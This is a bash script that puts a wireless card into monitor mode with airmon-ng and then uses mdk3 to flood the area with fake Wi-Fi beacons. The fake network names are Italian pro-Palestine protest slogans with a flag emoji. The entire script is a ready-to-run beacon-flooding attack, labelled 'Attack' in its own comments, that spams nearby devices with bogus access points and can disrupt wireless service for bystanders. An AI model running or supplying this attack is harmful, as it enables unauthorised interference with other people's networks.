#!/bin/bash

# --- Checks ---
if [ -z "$1" ]; then
    echo "Error: The interface name is missing. Please provide it in the configuration file."
    exit 1
fi

# --- Variables ---
INTERFACE=$1
MDK3_CONF_FILE="/tmp/mdk3_beacon_ssid.txt"
EMOJI="🇵🇸"
PHRASES=(
    "FERMATE IL GENOCIDIO"
    "LIBERTÀ PER LA PALESTINA"
    "BASTA BOMBE SUI BAMBINI"
    "GIUSTIZIA PER GAZA"
    "NO ALL'OCCUPAZIONE"
    "DIRITTO DI RITORNO SUBITO"
    "ABBATTIAMO IL MURO DELL'OPPRESSIONE"
    "IL SILENZIO È COMPLICITÀ"
    "PALESTINA NON È SOLA"
    "VOGLIAMO PACE, NON GUERRA"
    "SALVIAMO LE VITE INNOCENTI"
    "NON ALLA PULIZIA ETNICA"
    "DIFENDIAMO I DIRITTI UMANI"
    "VOGLIAMO UN FUTURO SENZA PAURA"
    "RESISTENZA È DIGNITÀ"
    "STOP ALLA VIOLENZA SUI CIVILI"
    "LA LIBERTÀ NON È UN CRIMINE"
    "BASTA STRAGI"
    "DIRITTO ALLA CASA PER TUTTI"
    "IL MONDO NON PUÒ IGNORARE"
    "FERMIAMO L'AGGRESSIONE"
    "GIUSTIZIA PER OGNI VITTIME"
    "VOGLIAMO VIVERE LIBERI"
    "ABBATTIAMO LE BARRIERE DELLA MORTE"
    "PALESTINA VIVA"
    "NON ALL'APARTHEID"
    "DIRITTO ALLA SICUREZZA"
    "FERMATE L'ESPROPRIAZIONE"
    "SALVIAMO I BAMBINI DI GAZA"
    "PALESTINA LIBERA ORA"
)
NUM_PHRASES=${#PHRASES[@]}

# --- Configuration ---
airmon-ng check kill
airmon-ng start ${INTERFACE}

> "$MDK3_CONF_FILE"

# -- Attack ---
for phrase in "${PHRASES[@]}"; do
    FULL_SSID="${phrase} ${EMOJI}"
    echo "$FULL_SSID" >> "$MDK3_CONF_FILE"
done

mdk3 "$INTERFACE" b -f "$MDK3_CONF_FILE" -a -g -m
